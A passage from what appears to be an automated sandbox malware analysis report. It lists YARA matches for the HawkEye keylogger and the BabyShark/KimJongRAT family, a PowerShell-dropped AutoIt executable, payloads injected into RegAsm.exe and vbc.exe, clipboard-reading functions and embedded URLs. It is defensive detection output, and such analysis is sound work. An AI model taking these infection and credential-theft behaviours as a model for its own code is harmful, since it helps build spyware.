Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://www.odwebp.svc.ms
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected HawkEye KeyloggerShow sources
Source: Yara matchFile source: 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.2312568414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001E.00000002.2306998175.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1516, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1156, type: MEMORY
Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality for read data from the clipboardShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,35_2_0040FDCB

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0000001E.00000002.2308683624.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000021.00000002.2312568414.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000001E.00000002.2306998175.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000021.00000002.2316002030.0000000005290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 1516, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 1156, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
Source: 33.2.RegAsm.exe.5290000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 30.2.RegAsm.exe.29c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 33.2.RegAsm.exe.5290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 30.2.RegAsm.exe.29c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Binary is likely a compiled AutoIt script fileShow sources
Source: qCXSc.Exe, 00000009.00000000.1806905504.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe, 00000009.00000000.1806905504.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: qCXSc.Exe, 0000000A.00000000.1816646937.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe, 0000000A.00000000.1816646937.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: qCXSc.Exe, 0000000F.00000000.1830653339.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe, 0000000F.00000000.1830653339.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: qCXSc.Exe, 00000014.00000000.1847406462.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe, 00000014.00000000.1847406462.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: qCXSc.Exe, 00000018.00000000.1864985294.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe, 00000018.00000000.1864985294.0000000000E3F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: qCXSc.Exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.
Source: qCXSc.Exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Powershell drops PE fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\qCXSc.ExeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,35_2_0040A5A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,36_2_0040A5A9
Detected potential crypto functionShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05128B5030_2_05128B50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512396830_2_05123968
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05124BB130_2_05124BB1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051279B830_2_051279B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05124FE030_2_05124FE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512A1E030_2_0512A1E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05127E5030_2_05127E50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05121C5830_2_05121C58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05120C9130_2_05120C91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051274C030_2_051274C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05127F3230_2_05127F32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05123B5830_2_05123B58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05128B4030_2_05128B40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512257830_2_05122578
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05123B6830_2_05123B68
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512256930_2_05122569
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512698030_2_05126980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05122FBB30_2_05122FBB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051253B830_2_051253B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05123FD830_2_05123FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051243C030_2_051243C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05122FC830_2_05122FC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051253C830_2_051253C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051279C830_2_051279C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05121BE130_2_05121BE1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0512082830_2_05120828
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_05127E4030_2_05127E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051260B030_2_051260B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051274B030_2_051274B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051260A030_2_051260A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051238D030_2_051238D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051238F130_2_051238F1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3326033_2_02F33260
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F37E5033_2_02F37E50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F34FE033_2_02F34FE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F33FD833_2_02F33FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F33B6833_2_02F33B68
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F374C033_2_02F374C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F30C9133_2_02F30C91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3009833_2_02F30098
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F39C8033_2_02F39C80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F31C5833_2_02F31C58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F385F033_2_02F385F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F379B833_2_02F379B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F332F333_2_02F332F3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F332DA33_2_02F332DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F332A133_2_02F332A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3325033_2_02F33250
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F37E4033_2_02F37E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F343C033_2_02F343C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F32FC833_2_02F32FC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F353C833_2_02F353C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F32FBB33_2_02F32FBB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F353B833_2_02F353B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3338033_2_02F33380
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3078433_2_02F30784
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F31B7133_2_02F31B71
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F33B5B33_2_02F33B5B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3335933_2_02F33359
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F37F3233_2_02F37F32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3333F33_2_02F3333F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F338D033_2_02F338D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F360B033_2_02F360B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F374B033_2_02F374B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F360A033_2_02F360A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3948033_2_02F39480
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3246133_2_02F32461
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3343133_2_02F33431
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3082833_2_02F30828
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F385E033_2_02F385E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F379C833_2_02F379C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3698033_2_02F36980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3257833_2_02F32578
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F3396833_2_02F33968
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_004360CE35_2_004360CE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040509C35_2_0040509C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040519935_2_00405199
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0043C2D035_2_0043C2D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0044040635_2_00440406
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040451D35_2_0040451D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_004045FF35_2_004045FF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040458E35_2_0040458E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040469035_2_00404690
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00414A5135_2_00414A51
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00404C0835_2_00404C08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00406C8E35_2_00406C8E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00415DF335_2_00415DF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00416E5C35_2_00416E5C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00410FE435_2_00410FE4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_004360CE36_2_004360CE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040509C36_2_0040509C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040519936_2_00405199
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0043C2D036_2_0043C2D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0044040636_2_00440406
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040451D36_2_0040451D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_004045FF36_2_004045FF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040458E36_2_0040458E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040469036_2_00404690
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00414A5136_2_00414A51
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00404C0836_2_00404C08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00406C8E36_2_00406C8E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00415DF336_2_00415DF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00416E5C36_2_00416E5C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00410FE436_2_00410FE4
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00445190 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416849 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0040924D appears 62 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00444C70 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0042FF22 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004166E8 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416A91 appears 176 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00444C5E appears 36 times
PE file contains strange resourcesShow sources
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qCXSc.Exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLsShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeSection loaded: oartgrfserver.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeSection loaded: oartgrfserver.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeSection loaded: oartgrfserver.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeSection loaded: oartgrfserver.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeSection loaded: oartgrfserver.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
Yara signature matchShow sources
Source: 0000001E.00000002.2308683624.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.2312568414.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001E.00000002.2306998175.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.2316002030.0000000005290000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 1516, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 1156, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
